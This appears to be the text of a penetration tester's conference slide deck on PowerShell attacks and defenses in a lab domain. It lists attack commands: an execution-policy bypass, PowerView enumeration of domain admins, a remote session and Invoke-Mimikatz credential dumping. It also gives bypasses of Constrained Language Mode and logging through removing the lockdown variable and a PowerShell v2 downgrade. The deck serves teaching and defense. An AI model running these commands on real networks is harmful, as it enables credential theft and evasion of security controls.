Pow Pow PowershellOCTAVIO PAGUAGA

About Me•Octavio/@oaktree__•Washington DC •Penetration tester working for Oaktree Security•“Woodworker”

3

What I hope you takeaway with

•Excite you to learn more about PowerShell and encourage you go out and learn more.

•Utilize PowerShell no matter what your role

•Upgrade and monitor PowerShell usage in your environment.

If you are absolutely new to PowerShell

• Videos• https://www.youtube.com/watch?v=4X_uBL2YpmA • https://www.youtube.com/watch?v=3vJvkANKVWA

• Books• PowerShell in a month of lunches• Windows Powershell Programming for the absolute beginner

Overview•Demo how PS can be used to attack

• PowerView and Invoke-Mimikatz

•Methods to detect PS activity

•Methods to limit PS activity• Constrained Language Mode• AppLocker• NetCease

•Valuable references

What is Powershell•Object oriented programming language for Windows

•Uses CMDLETS structured as verb-noun◦ Get-help◦ Get-command◦ Invoke-command

Powerview & Invoke-Mimikatz•Powerview is for reconnaissance

• Written by Will Schroeder (Harmj0y)• Power to domain users

•Mimikatz steals passwords

HTTPS://GITHUB.COM/HARMJ0Y/CHEATSHEETS/BLOB/MASTER/POWERVIEW.PDF

Attack Demonstration (INSERT NETWORK DIAGRAM FOR THE LAB)

List of Commands

used on oaktreelab

1

Start Powershell with execution policy set to bypass◦ Powershell.exe –exec bypass

Import powerview module◦ Import-module powerview.ps1

Identify all groups with the word admin in the name◦ Get-netgroups –groupname “*admin*”

Get members of domain admin group◦ Get-netgroupmemeber –groupname “domain admins”

List of Commands

used on oaktreelab

1(cont.)

Determine where user oaktree_dadm is located◦ Invoke-UserHunter –username “oaktree_dadm”

Connect to oaktreelab03◦ New-pssession –computername “oaktreelab03”◦ Enter-PsSession –id 1

Import mimikatz◦ Import-module invoke-mimikatz.ps1

Run Mimikatz◦ Invoke-Mimikatz

Addition from Presentation: The regular user used, has administrator privileges on the oaktreelab3 system. My original intention was to show how one could use powerview to also enumerate local groups as well.

Demo time

PowerShell Logging •What log records were created on oaktree3?

Powershell Desktop OS Server OS

Version 2 Windows 7 Windows 2008 R2

Version 3 Windows 8 Windows 2012

Version 4 Windows 8.1 Windows 2012 R2

Version 5 Windows 10 Windows 2016

Logging with PS 2

https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/

Deep Module logging

Command ran: Add-Member –membertype NoteProperty –Name memcpy –Value MyDelegateType –InputObject system.object

ScriptBlock logging

Transcription•Saves all output to Windows event logs.

•Can do this with PS2 as well! • Use modules start-transcription and stop-transcription

Countermeasures + or how could I made it harder for the attacker.

“Nobody made a greater mistake than he who did nothing because he could do only a little.” –Edmund Burke.

Demo Find sqrt of 64 [math]::sqrt(64)

Constrained Language Mode•Constrained language removes support for .Net & Windows API calls and COM access.

•How to enable• [environment]::SetEnvironmentVariable(‘__PSLockdownPolicy’,’4’,’Machine’)

•Confirm it is configured• $ExecutionContext.SessionState.LanguageMode

•How to disable• Remove-item env:\__PSLockdownPolicy• Through System Properties Environment variables.

What is AppLocker•Allows policies to be created based on:

• Executables• Windows Installer Rules• Script Rules• Package App Rules

Not all Windows 7 versions are created equal

HTTPS://TECHNET.MICROSOFT.COM/EN-US/LIBRARY/DD759131(V=WS.11).ASPX

Sample applocker Rules These rules are courtesy of Microsoft

◦ New-AppLockerPolicy -RuleType Path -FileInformation "c:\trusted\*.ps1" ◦ Open Secpol.msc Application control policies AppLocker script rules right click and select

“Automatically Generate Rules”◦ Allow all scripts for administrators◦ Allow all scripts to be run from the Program Files folder ◦ Allow all scripts to be run from the Windows Folder

Create a file in C:\trusted named math.ps1◦ Contents of file [math]::sqrt(64)

Applocker Demo

Applocker implementation considerations

•Ensure whitelisted folders have appropriate permissions set

•If the attacker has admin, applocker is defeated.

•Applocker evaluates deny rules first.• Use cmdlet test-applockerpolicy to confirm rules

Block powershell.exe•Powershell.exe is not an executable rather a wrapper for the dll. I don’t need to use powershell.exe.

•Search for ben0xa talk: Powershell Secrets and Tactics

Anti-malware scanning interface•AMSI allows us to do:

• evaluate code just prior to execution by the script host• evaluate code after all the obfuscation has been stripped away

HTTPS://BLOGS.TECHNET.MICROSOFT.COM/POSHCHAP/2015/10/16/SECURITY-FOCUS-DEFENDING-POWERSHELL-WITH-THE-ANTI-MALWARE-SCAN-INTERFACE-AMSI/HTTPS://WWW.BLACKHAT.COM/DOCS/US-16/MATERIALS/US-16-MITTAL-AMSI-HOW-WINDOWS-10-PLANS-TO-STOP-SCRIPT-BASED-ATTACKS-AND-HOW-WELL-IT-DOES-IT.PDF

How do we make recon harder?

NetCease•Written by Itai Grady the goal of this script increase the security of the netsessionenum api

HTTPS://GALLERY.TECHNET.MICROSOFT.COM/NET-CEASE-BLOCKING-NET-1E8DCB5BHTTP://WWW.HARMJ0Y.NET/BLOG/CATEGORY/PENETESTING/HTTPS://ADSECURITY.ORG/?P=3299

How to bypass everything we just discussed

Utilize PS 2 if installed◦ Powershell.exe –version 2

Credits: Reference material from Microsoft

Sean Metcalf

Ben0xa

Will Shroeder & Matt Graeber

05/03/2023 35

On the Shoulder of Giants•@Ben0xA•Carlos Perez @darkoperator•Jared Haight @jaredhaight•Sean Metcalf @pyrotek3

THANKS TO EVERYONE THAT INSPIRED US TO GET STARTED

36

On the Shoulder of Giants•Jared Atkinson @jaredcatkinson•Matt Graber @mattifestation •Will Shroeder @harmJoy

05/03/2023 37

On the Shoulder of Giants

•Lee Holmes @lee_holmes •Jessica Payne @jepayneMSFT•@enigma0x3•Casey Smith @subtee•Chris Cambell @obscuresec

THANKS TO EVERYONE THAT INSPIRED US TO GET STARTED

Questions/Comments Slides available on my github page

Octavio Paguaga

@oaktree__ <----- Two underscores

Octavio.paguaga@oaktreesecurity.com